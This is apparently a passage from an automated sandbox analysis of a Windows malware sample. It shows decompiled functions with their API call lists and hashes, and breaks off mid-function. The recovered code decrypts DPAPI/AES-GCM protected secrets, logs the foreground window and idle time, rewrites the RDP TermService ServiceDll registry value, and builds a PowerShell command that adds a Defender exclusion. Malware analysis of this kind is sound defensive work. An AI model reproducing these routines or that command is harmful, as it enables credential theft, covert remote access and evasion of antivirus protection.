                                  				intOrPtr _v272;
                                  				intOrPtr _v284;
                                  				char _v288;
                                  				struct HINSTANCE__* _t5;
                                  				_Unknown_base(*)()* _t8;
                                  
                                  				_v288 = 0x11c;
                                  				_t5 = LoadLibraryA("ntdll.dll");
                                  				if(_t5 == 0) {
                                  					L3:
                                  					if(_v272 != 2) {
                                  						goto L5;
                                  					} else {
                                  						return _v284;
                                  					}
                                  				} else {
                                  					_t8 = GetProcAddress(_t5, "RtlGetVersion");
                                  					if(_t8 == 0) {
                                  						L5:
                                  						return 0;
                                  					} else {
                                  						 *_t8( &_v288);
                                  						goto L3;
                                  					}
                                  				}
                                  			}


                                  APIs
                                  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410A54
                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410A64
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RtlGetVersion$ntdll.dll
                                  • API String ID: 2574300362-1489217083
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 40%
                                  			E004121DC(intOrPtr* __ecx) {
                                  				signed int _v8;
                                  				_Unknown_base(*)()* _t6;
                                  				intOrPtr* _t12;
                                  
                                  				_push(__ecx);
                                  				_v8 = _v8 & 0x00000000;
                                  				_t12 = __ecx;
                                  				_t6 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                  				if(_t6 != 0) {
                                  					 *_t6( *_t12,  &_v8);
                                  				}
                                  				return _v8;
                                  			}


                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?), ref: 004121F1
                                  • GetProcAddress.KERNEL32(00000000), ref: 004121F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: IsWow64Process$kernel32
                                  • API String ID: 1646373207-3789238822
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E0040D01D(signed int* __ecx, intOrPtr _a4) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				void* _t22;
                                  				void* _t23;
                                  				void* _t33;
                                  				struct _CRITICAL_SECTION* _t43;
                                  				signed int* _t59;
                                  				intOrPtr _t62;
                                  				void* _t66;
                                  
                                  				_t45 = __ecx;
                                  				_push(__ecx);
                                  				_push(__ecx);
                                  				_t59 = __ecx;
                                  				_t43 = __ecx + 0x3d8;
                                  				EnterCriticalSection(_t43);
                                  				_t67 = _t59[0x7b];
                                  				_t62 = _a4;
                                  				if(_t59[0x7b] != 0) {
                                  					L2:
                                  					_t69 = _t59[3];
                                  					if(_t59[3] != 0) {
                                  						L5:
                                  						_t63 =  &(_t59[0xf1]);
                                  						_t22 = E004021ED( &(_t59[0xf1]), 0);
                                  						__eflags = _t22;
                                  						if(_t22 == 0) {
                                  							E00401F98(_t63);
                                  						}
                                  						_t23 = E004021ED( &(_t59[0xf3]), 0);
                                  						__eflags = _t23;
                                  						if(_t23 == 0) {
                                  							E00401F98( &(_t59[0xf3]));
                                  						}
                                  						_v12 = _t59[4];
                                  						_v8 = _t59[0x7c];
                                  						E00401F6D(_t63, E0040CF43,  &_v12);
                                  						E00401F6D( &(_t59[0xf3]), E0040CFB0,  &_v12);
                                  						 *_t59 = 1;
                                  						LeaveCriticalSection(_t43);
                                  						E004021ED( &(_t59[0xf1]), 0xffffffff);
                                  						E004021ED( &(_t59[0xf3]), 0xffffffff);
                                  						EnterCriticalSection(_t43);
                                  						 *_t59 =  *_t59 & 0x00000000;
                                  						LeaveCriticalSection(_t43);
                                  						E0040D1C8(_t59);
                                  						_t33 = 0;
                                  						__eflags = 0;
                                  					} else {
                                  						E00403507(_t66, _t62);
                                  						if(E0040594B( &(_t59[1]), _t69, _t45,  *((intOrPtr*)(_t62 + 4))) != 0) {
                                  							goto L5;
                                  						} else {
                                  							goto L4;
                                  						}
                                  					}
                                  				} else {
                                  					E00403507(_t66, _t62 + 8);
                                  					if(E0040594B( &(_t59[0x79]), _t67,  &(_t59[0x79]),  *((intOrPtr*)(_t62 + 0xc))) == 0) {
                                  						L4:
                                  						LeaveCriticalSection(_t43);
                                  						_t33 = 1;
                                  					} else {
                                  						goto L2;
                                  					}
                                  				}
                                  				return _t33;
                                  			}


                                  APIs
                                  • EnterCriticalSection.KERNEL32(?), ref: 0040D02E
                                  • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 0040D07D
                                    • Part of subcall function 00403507: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,00402BD2,?,?,00000000,exit,00000000,start), ref: 0040352C
                                    • Part of subcall function 0040594B: getaddrinfo.WS2_32(74A313FB,00000000,00404FB9,00000000), ref: 00405998
                                    • Part of subcall function 0040594B: socket.WS2_32(00000002,00000001,00000000), ref: 004059AF
                                    • Part of subcall function 0040594B: htons.WS2_32(00000000), ref: 004059D5
                                    • Part of subcall function 0040594B: freeaddrinfo.WS2_32(00000000), ref: 004059E5
                                    • Part of subcall function 0040594B: connect.WS2_32(?,?,00000010), ref: 004059F1
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040D101
                                  • EnterCriticalSection.KERNEL32(?), ref: 0040D11E
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040D128
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$Leave$Enter$connectfreeaddrinfogetaddrinfohtonslstrcpysocket
                                  • String ID:
                                  • API String ID: 4195813003-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00410BBE(WCHAR** __ecx, intOrPtr* __edx) {
                                  				struct HRSRC__* _t13;
                                  				void* _t14;
                                  				unsigned int _t32;
                                  				intOrPtr* _t35;
                                  				struct HINSTANCE__* _t36;
                                  
                                  				_t35 = __edx;
                                  				_t36 = LoadLibraryExW( *__ecx, 0, 2);
                                  				if(_t36 == 0xffffffff) {
                                  					L4:
                                  					return 0;
                                  				}
                                  				_t13 = FindResourceW(_t36, 1, 0x10);
                                  				if(_t13 == 0) {
                                  					goto L4;
                                  				}
                                  				_t14 = LoadResource(_t36, _t13);
                                  				if(_t14 == 0) {
                                  					goto L4;
                                  				}
                                  				_t32 =  *(_t14 + 0x28);
                                  				 *_t35 =  *((intOrPtr*)(_t14 + 0x14));
                                  				 *((short*)(_t35 + 4)) =  *((intOrPtr*)(_t14 + 0x1a));
                                  				 *((short*)(_t35 + 6)) =  *((intOrPtr*)(_t14 + 0x18));
                                  				 *(_t35 + 8) = _t32 & 1;
                                  				 *(_t35 + 0xc) = _t32 >> 0x00000001 & 1;
                                  				 *(_t35 + 0x10) = _t32 >> 0x00000003 & 1;
                                  				 *(_t35 + 0x14) = _t32 >> 0x00000005 & 1;
                                  				FreeLibrary(_t36);
                                  				return 1;
                                  			}


                                  APIs
                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,0040DB4A), ref: 00410BC9
                                  • FindResourceW.KERNEL32(00000000,00000001,00000010,?,00000000,00000002,?,?,?,0040DB4A), ref: 00410BDD
                                  • LoadResource.KERNEL32(00000000,00000000,?,00000000,00000002,?,?,?,0040DB4A), ref: 00410BE9
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000002,?,?,?,0040DB4A), ref: 00410C2E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoadResource$FindFree
                                  • String ID:
                                  • API String ID: 3272429154-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E0040C157(void* __ecx, intOrPtr _a8, intOrPtr _a12) {
                                  				char _v8;
                                  				void* _v12;
                                  				char _v16;
                                  				void* _t16;
                                  				void* _t19;
                                  				void* _t34;
                                  				void* _t35;
                                  
                                  				_t35 = 0;
                                  				_t16 = E0040C3B9(__ecx,  &_v12,  &_v8);
                                  				_pop(_t26);
                                  				if(_t16 == 0) {
                                  					L8:
                                  					return _t35;
                                  				}
                                  				_t34 = _v12;
                                  				if(_v8 >= 5) {
                                  					_t19 = E00401000(_t34, "DPAPI", 5);
                                  					_t42 = _t19;
                                  					if(_t19 == 0) {
                                  						_push( &_v16);
                                  						_push( &_v12);
                                  						if(E0040C1DD(_t34 + 5, _v8 - 5, _t42) != 0) {
                                  							if(_v16 == 0x20) {
                                  								_t35 = E0040C419(_t22, _v12, _a8, _a12);
                                  							}
                                  							LocalFree(_v12);
                                  						}
                                  					}
                                  				}
                                  				LocalFree(_t34);
                                  				goto L8;
                                  			}


                                  APIs
                                    • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                    • Part of subcall function 0040C3B9: LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                    • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                    • Part of subcall function 0040C3B9: LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                  • LocalFree.KERNEL32(?,00000000,-0000003A,00000000,?), ref: 0040C1D1
                                    • Part of subcall function 0040C1DD: GetLastError.KERNEL32 ref: 0040C243
                                  • LocalFree.KERNEL32(?), ref: 0040C1CA
                                    • Part of subcall function 0040C419: BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0040C1C4,?), ref: 0040C436
                                    • Part of subcall function 0040C419: BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0040C1C4,?), ref: 0040C44F
                                    • Part of subcall function 0040C419: BCryptGenerateSymmetricKey.BCRYPT(00000020,0040C1C4,00000000,00000000,?,00000020,00000000,?,0040C1C4,?), ref: 0040C464
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt$Local$Free$BinaryString$AlgorithmAllocErrorGenerateLastOpenPropertyProviderSymmetric
                                  • String ID: $DPAPI
                                  • API String ID: 379455710-1819349886
                                  • Opcode ID: 723dafc30d50a614663938c1a140f779ca85de166bebee2fe5dd54bad53c82e3
                                  • Instruction ID: a3944bf262eb46a5dfa84945d41dbb41adefefd1d9f51366da1d16fc86cbb9f5
                                  • Opcode Fuzzy Hash: 723dafc30d50a614663938c1a140f779ca85de166bebee2fe5dd54bad53c82e3
                                  • Instruction Fuzzy Hash: ED016176900109EBCF10EBA1DC859EEB779AB44358F018276FD00B61C5E774AA45CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E004048B7(intOrPtr _a4) {
                                  				char _v8;
                                  				struct tagLASTINPUTINFO _v16;
                                  				signed int _v36;
                                  				char _v40;
                                  				short _v552;
                                  
                                  				_v16.cbSize = 8;
                                  				GetLastInputInfo( &_v16);
                                  				_t23 = GetTickCount() - _v16.dwTime;
                                  				GetWindowTextW(GetForegroundWindow(),  &_v552, 0x100);
                                  				E004036F7( &_v8,  &_v552);
                                  				_t12 =  &_v36;
                                  				_v36 = _v36 & 0x00000000;
                                  				asm("xorps xmm0, xmm0");
                                  				_v40 = 0x15;
                                  				asm("movups [ebp-0x1c], xmm0");
                                  				E0040378B(E00403873(E00403852( &_v40, (GetTickCount() - _v16.dwTime) / 0x3e8), _t23 % 0x3e8,  &_v8),  *_t12, _a4);
                                  				E00403777( &_v40);
                                  				E00405FEB(_v8);
                                  				return _a4;
                                  			}

                                  APIs
                                  • GetLastInputInfo.USER32 ref: 004048CC
                                  • GetTickCount.KERNEL32 ref: 004048D2
                                  • GetForegroundWindow.USER32 ref: 004048E6
                                  • GetWindowTextW.USER32 ref: 004048F9
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Windowlstrlen$CountForegroundFreeInfoInputLastTextTickVirtuallstrcpy
                                  • String ID:
                                  • API String ID: 2567647128-0
                                  • Opcode ID: 46720f723d15755cbf12386a5d990a83d361cd051bbd11b0eb8a51d3c765656a
                                  • Instruction ID: 7d24786f3acb5e761febb0f7532cdf611125a99f062c3633d978c4158144353a
                                  • Opcode Fuzzy Hash: 46720f723d15755cbf12386a5d990a83d361cd051bbd11b0eb8a51d3c765656a
                                  • Instruction Fuzzy Hash: D2110C72D00109ABCB04EFA1DD59ADDBBBDEF58305F0081A9B406B7191EF78AB44CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040FFA8(void* __ecx) {
                                  				void* _t14;
                                  				long _t15;
                                  				void** _t26;
                                  				void* _t27;
                                  
                                  				_t27 = __ecx;
                                  				_t1 = _t27 + 0x14; // 0x42661c
                                  				_t26 = _t1;
                                  				if( *_t26 == 0) {
                                  					L6:
                                  					_t5 = _t27 + 0x10; // 0x426618
                                  					E004101AB(_t5);
                                  					_t6 = _t27 + 4; // 0x42660c
                                  					E004101AB(_t6);
                                  					_t7 = _t27 + 0xc; // 0x426614
                                  					E004101AB(_t7);
                                  					_t8 = _t27 + 8; // 0x426610
                                  					_t14 = E004101AB(_t8);
                                  					 *(_t27 + 0x18) =  *(_t27 + 0x18) & 0x00000000;
                                  					return _t14;
                                  				}
                                  				_t15 = GetCurrentThreadId();
                                  				_t2 = _t27 + 0x18; // 0x0
                                  				if(_t15 ==  *_t2) {
                                  					L5:
                                  					E004101AB(_t26);
                                  					goto L6;
                                  				}
                                  				if( *(_t27 + 0x10) == 0) {
                                  					return _t15;
                                  				}
                                  				_t4 = _t27 + 0x10; // 0x0
                                  				SetEvent( *_t4);
                                  				if(WaitForSingleObject( *_t26, 0x1388) == 0x102) {
                                  					TerminateThread( *_t26, 0xfffffffe);
                                  				}
                                  				goto L5;
                                  			}

                                  APIs
                                  • GetCurrentThreadId.KERNEL32(?,00000000,00402BC7,00000000,exit,00000000,start), ref: 0040FFB4
                                  • SetEvent.KERNEL32(00000000), ref: 0040FFC8
                                  • WaitForSingleObject.KERNEL32(0042661C,00001388), ref: 0040FFD5
                                  • TerminateThread.KERNEL32(0042661C,000000FE), ref: 0040FFE6
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Thread$CurrentEventObjectSingleTerminateWait
                                  • String ID:
                                  • API String ID: 2174867186-0
                                  • Opcode ID: 9d65ee8b535991cc2c83cc34afe86964b00005fc8ac1bd73bdc2cdf835250f44
                                  • Instruction ID: feb65e06b3125344950c2ecfb6ecdf7295e9879baf5c0db247f31f74b0556ec4
                                  • Opcode Fuzzy Hash: 9d65ee8b535991cc2c83cc34afe86964b00005fc8ac1bd73bdc2cdf835250f44
                                  • Instruction Fuzzy Hash: 04011231004641EBE734AF11EC89AEA7BB2BF54315F504A3EF097515E2CBB969C9CA44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 32%
                                  			E004111D7(intOrPtr* __ecx, void* __edx) {
                                  				void* _v8;
                                  				char _v12;
                                  				char _v16;
                                  				int _v20;
                                  				char _v24;
                                  				int* _t18;
                                  				void* _t48;
                                  				int* _t50;
                                  
                                  				_t48 = __edx;
                                  				_t35 = __ecx;
                                  				_t50 = __ecx;
                                  				_v8 = 0;
                                  				_v24 = 0;
                                  				_v20 = 0;
                                  				 *((intOrPtr*)(__ecx)) = 0;
                                  				 *((intOrPtr*)(__ecx + 4)) = 0;
                                  				if( *0x55ad8c != 0) {
                                  					_t18 = 0x55ad88;
                                  				} else {
                                  					RegOpenKeyExW(0x80000002,  *(E004036F7( &_v12, L"SOFTWARE\\Microsoft\\Cryptography")), 0, 0x101,  &_v8);
                                  					asm("sbb esi, esi");
                                  					E00405FEB(_v12);
                                  					if(1 != 0) {
                                  						E00412569(_t48, E004036F7( &_v12, L"MachineGuid"),  &_v24);
                                  						E00405FEB(_v12);
                                  						E00412554( &_v8);
                                  					}
                                  					E00402FCE(_t50, E004061C0( &_v16,  &_v24));
                                  					E00403148( &_v16);
                                  					_t35 = 0x55ad88;
                                  					_t18 = _t50;
                                  				}
                                  				E00402FCE(_t35, _t18);
                                  				E00403148( &_v24);
                                  				E00412554( &_v8);
                                  				return _t50;
                                  			}

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0041121B
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                    • Part of subcall function 00412554: RegCloseKey.KERNEL32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                  • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                  • API String ID: 1903904756-1211650757
                                  • Opcode ID: 0c82c9a53f3f990eb4086e73eb5f784c8d770a9f7970ecd65c7419a389387ce6
                                  • Instruction ID: abda254be5c657bc903fa0ced37de60f06049733804472e9a7e1bd392f4ec8b1
                                  • Opcode Fuzzy Hash: 0c82c9a53f3f990eb4086e73eb5f784c8d770a9f7970ecd65c7419a389387ce6
                                  • Instruction Fuzzy Hash: 40115C30A0011AAACB04EF95C9628EEBB79AF54745B50016FF401B31D1DBB85F49DBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040DCBF(void* __edx) {
                                  				void* _v8;
                                  				void* _v12;
                                  				short* _v16;
                                  				int _v20;
                                  				char _v24;
                                  				void* _t28;
                                  				void* _t46;
                                  				int _t48;
                                  
                                  				_t46 = __edx;
                                  				_v8 = 0;
                                  				E004036F7( &_v16, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
                                  				_v24 = 0;
                                  				_v20 = 0;
                                  				if(RegOpenKeyExW(0x80000002, _v16, 0, 0x20119,  &_v8) != 0) {
                                  					L3:
                                  					_t48 = 0;
                                  				} else {
                                  					_t28 = E00412569(_t46, E004036F7( &_v12, L"ServiceDll"),  &_v24);
                                  					E00405FEB(_v12);
                                  					if(_t28 != 0) {
                                  						_t48 = E0040335A(E0040300A( &_v24,  &_v12), 0x55ad4c);
                                  						E00405FEB(_v12);
                                  						_v12 = 0;
                                  					} else {
                                  						E00412554( &_v8);
                                  						goto L3;
                                  					}
                                  				}
                                  				E00403148( &_v24);
                                  				E00405FEB(_v16);
                                  				E00412554( &_v8);
                                  				return _t48;
                                  			}

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,0055AD18,?,?,0040E2F1,?,?), ref: 0040DCF1
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00412554: RegCloseKey.KERNEL32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  Strings
                                  • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040DCCC
                                  • ServiceDll, xrefs: 0040DCFF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                  • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                  • API String ID: 1903904756-387424650
                                  • Opcode ID: 7ab0eea5afd062f5f65387bf4bcc203051eea5cec69280cb6f9a26493aa2497a
                                  • Instruction ID: 01bca762208379d142ed9eb01ac329b8ace23437b38cc5e4ab4ac662769df0df
                                  • Opcode Fuzzy Hash: 7ab0eea5afd062f5f65387bf4bcc203051eea5cec69280cb6f9a26493aa2497a
                                  • Instruction Fuzzy Hash: EB114C71D00209BACB14EFA2C9928EEBB78EE50705F10016AE801B72C1DB785F05CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040D856(void* __ecx, void* __edx) {
                                  				void* _v12;
                                  				void* _v16;
                                  				short* _v20;
                                  				int _v24;
                                  				char _v28;
                                  				char _v36;
                                  				void* _t26;
                                  				void* _t28;
                                  				void* _t43;
                                  				int _t44;
                                  				void* _t45;
                                  
                                  				_t43 = __edx;
                                  				_t45 = __ecx;
                                  				_t44 = 0;
                                  				_v12 = 0;
                                  				E004036F7( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
                                  				_v28 = 0;
                                  				_v24 = 0;
                                  				if(RegOpenKeyExW(0x80000002, _v20, 0, 0x102,  &_v12) == 0) {
                                  					_t26 = E00403333(_t45 + 0x34, _t43,  &_v36);
                                  					_t28 = E004125DF( &_v12, E004036F7( &_v16, L"ServiceDll"), _t26, 2);
                                  					E00405FEB(_v16);
                                  					_v16 = 0;
                                  					E00403148( &_v36);
                                  					E00412554( &_v12);
                                  					if(_t28 != 0) {
                                  						_t44 = 1;
                                  					}
                                  				}
                                  				E00403148( &_v28);
                                  				E00405FEB(_v20);
                                  				E00412554( &_v12);
                                  				return _t44;
                                  			}

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0040D88A
                                    • Part of subcall function 004125DF: RegSetValueExW.KERNEL32(?,000F003F,00000000,80000001,?,?,?,?,004127D2,?,?,00000003,80000001,?,000F003F,00000000), ref: 004125FE
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00412554: RegCloseKey.KERNEL32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  Strings
                                  • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040D862
                                  • ServiceDll, xrefs: 0040D8A3
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$CloseFreeOpenValueVirtuallstrcpy
                                  • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                  • API String ID: 2854241163-387424650
                                  • Opcode ID: ba8d4023aa76601c343723c15223fb17b564002561b68f10df811a01d0a3b275
                                  • Instruction ID: f4c174c2a9310d4c42edb30c9c3d52768df1180ce11ea76c469564d993fc98ad
                                  • Opcode Fuzzy Hash: ba8d4023aa76601c343723c15223fb17b564002561b68f10df811a01d0a3b275
                                  • Instruction Fuzzy Hash: C2111C75D00219ABCB14EF92CC96DEFBB79EF94704F40406EE812B22D1DB785A45CA68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E00412569(void* __edx, short** _a4, intOrPtr _a8) {
                                  				int _v8;
                                  				int _v12;
                                  				void* __ecx;
                                  				void* _t14;
                                  				short** _t23;
                                  				void** _t25;
                                  				void** _t32;
                                  				char* _t36;
                                  
                                  				_push(_t25);
                                  				_push(_t25);
                                  				_t23 = _a4;
                                  				_t32 = _t25;
                                  				_v8 = 0;
                                  				_v12 = 0;
                                  				if(RegQueryValueExW( *_t32,  *_t23, 0,  &_v12, 0,  &_v8) != 0) {
                                  					L5:
                                  					_t14 = 0;
                                  				} else {
                                  					_t36 = E00401085(_v8);
                                  					if(RegQueryValueExW( *_t32,  *_t23, 0,  &_v12, _t36,  &_v8) != 0) {
                                  						goto L5;
                                  					} else {
                                  						E004030CC(_a8, _t36, _v8);
                                  						if(_t36 != 0) {
                                  							E00401099(_t36);
                                  						}
                                  						_t14 = 1;
                                  					}
                                  				}
                                  				return _t14;
                                  			}

                                  APIs
                                  • RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                    • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                    • Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$ProcessQueryValue$AllocateFree
                                  • String ID: ?VA
                                  • API String ID: 3459632794-1028452459
                                  • Opcode ID: 0b292bdef0829f50d569de129b07e1f12dd45be3c1f1d3bd40aaa1ef304ff4b6
                                  • Instruction ID: ef5b91e0520f3c1ad74f83bd351b8b7f17400620d7ac54be9350e6622f7c98ba
                                  • Opcode Fuzzy Hash: 0b292bdef0829f50d569de129b07e1f12dd45be3c1f1d3bd40aaa1ef304ff4b6
                                  • Instruction Fuzzy Hash: E7019E72900118BFEB15DFA1DD85DEF7BBDEF08354B10007AF901E2250EA749F959AA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00414F7E(void* __ecx, void* __eflags) {
                                  				CHAR* _t21;
                                  				CHAR* _t22;
                                  
                                  				_t22 = E00401085(0x100);
                                  				_t21 = E00401085(0x100);
                                  				E00401052(_t22, 0, 0x100);
                                  				E00401052(_t21, 0, 0x100);
                                  				GetModuleFileNameA(0, _t22, 0x100);
                                  				E0040102C(_t21, "powershell Add-MpPreference -ExclusionPath ", E00401133("powershell Add-MpPreference -ExclusionPath "));
                                  				_t1 =  &(_t21[0x2b]); // 0x2b
                                  				E0040102C(_t1, _t22, 3);
                                  				_t2 =  &(_t22[0xff]); // 0xff
                                  				E0040102C(E00401133(_t21) + _t21, _t2, 1);
